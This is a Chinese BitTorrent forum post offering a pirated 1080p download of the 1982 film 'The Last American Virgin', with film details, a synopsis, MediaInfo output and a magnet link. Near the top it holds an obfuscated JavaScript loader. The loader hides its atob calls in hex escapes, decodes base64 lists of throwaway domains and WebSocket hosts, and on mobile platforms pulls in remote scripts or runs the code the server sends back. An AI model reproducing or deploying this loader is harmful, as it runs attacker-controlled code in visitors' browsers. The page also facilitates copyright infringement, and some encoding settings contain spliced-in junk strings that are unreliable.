美国最后的处男[中文字幕].The.Last.American.Virgin.1982.1080p.迅雷下载 10.83GB

版主小s 26天前 325

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x5a\x7a\x72\x64\x63\x78\x64\x57\x4c\x41']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 美国最后的处男 / 美国最后的处女

◎片 名 The Last American Virgin

◎年 代 1982

◎产 地 USA

◎类 别 剧情 / 喜剧 / 爱情

◎语 言 English

◎上映日期 1982-06-26

◎IMDb链接 https://www.imdb.com/title/tt0084234/

◎豆瓣评分 7.3/10 (247人评价)

◎豆瓣链接 https://movie.douban.com/subject/1433788/

◎片 长 92分钟

◎导 演 博兹·大卫逊 Boaz Davidson (id:1040974)

◎编 剧 博兹·大卫逊 Boaz Davidson (id:1040974)

◎演 员 菲尔·鲁本斯坦 Phil Rubenstein (id:1145673)

金米·罗伯特森 Kimmy Robertson (id:1144265)

Joe Rubbo Joe Rubbo (id:1143796)

路易莎·莫里茨 Louisa Moritz (id:1132114)

朱丽安娜·麦卡蒂 Julianna McCarthy (id:1123788)

劳伦斯·莫努森 Lawrence Monoson (id:1116418)

保罗·基斯 Paul Keith (id:1104933)

Peter Ellenstein Peter Ellenstein (id:1086471)

戴安·富兰克林 Diane Franklin (id:1082275)

Harry Bugin Harry Bugin (id:1077446)

史蒂芬·安汀 Steven Antin (id:1058498)

Robert Doran Robert Doran (id:1038857)

Sandy Sprung Sandy Sprung (id:1037842)

梅儿·威尔斯 Mel Welles (id:1008116)

Yoram Globus Yoram Globus (id:1284987)

戴维·沃马克 David Womark (id:1276397)

米纳罕·戈兰 Menahem Golan (id:1054262)

亚当·格林伯格 Adam Greenberg (id:1276464)

Jim Dultz Jim Dultz (id:1282797)

Mark Allan Mark Allan (id:1277029)

◎标 签 美国 / 青春 / 性喜剧 / 美国电影 / 爱情 / 情色 / 1982 / 电影

◎简 介

加里,比格,里基是三个最要好的拍档,有一次加里送外卖时看到了迷人的克伦,对她一见钟情。不巧的是好朋友里基也同时喜欢上克伦,可他本想玩弄她,而事情发展到后来,美丽的克伦也被他所吸引,两人欲火燃烧,忘乎所以,而当克伦怀孕后,里基却在这时候甩掉了她,留下了一个乱摊子让加里收拾……

  1. General

  2. Unique ID : 244739329425794746867118130538756339403 (0xB81F148F43A6212D96727D70C79E76CB)

  3. Complete name : The.Last.American.Virgin.1982.1080p.BluRay.x264.DTS.2.0-PTH.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 10.8 GiB

  7. Duration : 1 h 33 min

  8. Overall bit rate : 16.6 Mb/s

  9. Movie name : The Last American Virgin 1982

  10. Encoded date : UTC 2021-06-29 04:17:48

  11. Writing application : mkvmerge v58.0.0 ('Supper's Ready') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  13. Cover : Yes

  14. Attachments : cover.jpg


  15. Video

  16. ID : 1

  17. Format : AVC

  18. Format/Info : Advanced Video Codec

  19. Format profile : [email protected]

  20. Format settings : CABAC / 4 Ref Frames

  21. Format settings, CABAC : Yes

  22. Format settings, Reference frames : 4 frames

  23. Codec ID : V_MPEG4/ISO/AVC

  24. Duration : 1 h 33 min

  25. Bit rate : 15.0 Mb/s

  26. Width : 1 920 pixels

  27. Height : 1 040 pixels

  28. Display aspect ratio : 1.85:1

  29. Frame rate mode : Constant

  30. Frame rate : 23.976 (24000/1001/53354) FPS

  31. Color space : YUV

  32. Chroma subsampling : 4:2:0

  33. Bit depth : 8 bits

  34. Scan type : Progressive

  35. Bits/(Pixel*Frame) : 0.314

  36. Stream size : 9.81 GiB (91%)

  37. Writing library : x264 core 163 r3059+79M f2a8266 t_mod_test_xavc [(8 & 10)[email protected] X86_64]

  38. Encoding settings : cabac=1 / ref=4 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=48 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-3 / threads=32 / lookahead_threads=8 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=11 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=1 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=72 / rc=crf / mbtree=0 / crf=19.6000 / qcomp=0.60 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / pb_ratio=1.30 / aq=3:0.70 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0

  39. Language : English

  40. Default : Yes

  41. Forced : No


  42. Audio

  43. ID : 2

  44. Format : DTS

  45. Format/Info : Digital Theater Systems

  46. Codec ID : A_DTS

  47. Duration : 1 h 33 min

  48. Bit rate mode : Constant

  49. Bit rate : 1 509 kb/s

  50. Channel(s) : 2 channels

  51. Channel layout : L R

  52. Sampling rate : 48.0 kHz

  53. Frame rate : 93.750 FPS (512 SPF)

  54. Bit depth : 24 bits

  55. Compression mode : Lossy

  56. Stream size : 1 008 MiB (9%)

  57. Language : English

  58. Default : Yes

  59. Forced : No


  60. Text #1

  61. ID : 3

  62. Format : PGS

  63. Muxing mode : zlib

  64. Codec ID : S_HDMV/PGS

  65. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  66. Duration : 1 h 30 min

  67. Bit rate : 38.2 kb/s

  68. Count of elements : 2443

  69. Stream size : 24.8 MiB (0%)

  70. Title : chs&eng

  71. Language : Chinese

  72. Default : Yes

  73. Forced : No


  74. Text #2

  75. ID : 4

  76. Format : PGS

  77. Muxing mode : zlib

  78. Codec ID : S_HDMV/PGS

  79. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  80. Duration : 1 h 30 min

  81. Bit rate : 38.5 kb/s

  82. Count of elements : 2443

  83. Stream size : 25.0 MiB (0%)

  84. Title : cht&eng

  85. Language : Chinese

  86. Default : No

  87. Forced : No


  88. Text #3

  89. ID : 5

  90. Format : PGS

  91. Muxing mode : zlib

  92. Codec ID : S_HDMV/PGS

  93. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  94. Duration : 1 h 30 min

  95. Bit rate : 23.2 kb/s

  96. Count of elements : 2443

  97. Stream size : 15.1 MiB (0%)

  98. Title : chs

  99. Language : Chinese

  100. Default : No

  101. Forced : No


  102. Text #4

  103. ID : 6

  104. Format : PGS

  105. Muxing mode : zlib

  106. Codec ID : S_HDMV/PGS

  107. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  108. Duration : 1 h 30 min

  109. Bit rate : 23.5 kb/s

  110. Count of elements : 2443

  111. Stream size : 15.3 MiB (0%)

  112. Title : cht

  113. Language : Chinese

  114. Default : No

  115. Forced : No


  116. Text #5

  117. ID : 7

  118. Format : UTF-8

  119. Codec ID : S_TEXT/UTF8

  120. Codec ID/Info : UTF-8 Plain Text

  121. Duration : 1 h 28 min

  122. Bit rate : 48 b/s

  123. Count of elements : 1195

  124. Stream size : 31.7 KiB (0%)

  125. Language : English

  126. Default : No

  127. Forced : No


  128. Menu

  129. 00:00:00.000 : Chapter 01

  130. 00:00:10.928 : Chapter 02

  131. 00:09:10.550 : Chapter 03

  132. 00:20:49.540 : Chapter 04

  133. 00:31:55.664 : Chapter 05

  134. 00:42:38.097 : Chapter 06

  135. 00:54:41.695 : Chapter 07

  136. 01:08:52.503 : Chapter 08

  137. 01:23:07.357 : Chapter 09

  138. 01:33:12.545 : Chapter 10


TAGS 剧情 喜剧 爱情

磁力链:
  • magnet:?xt=urn:btih:B7A782193F1BCB8BAEBC6D00F0BBF4160148D41E
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回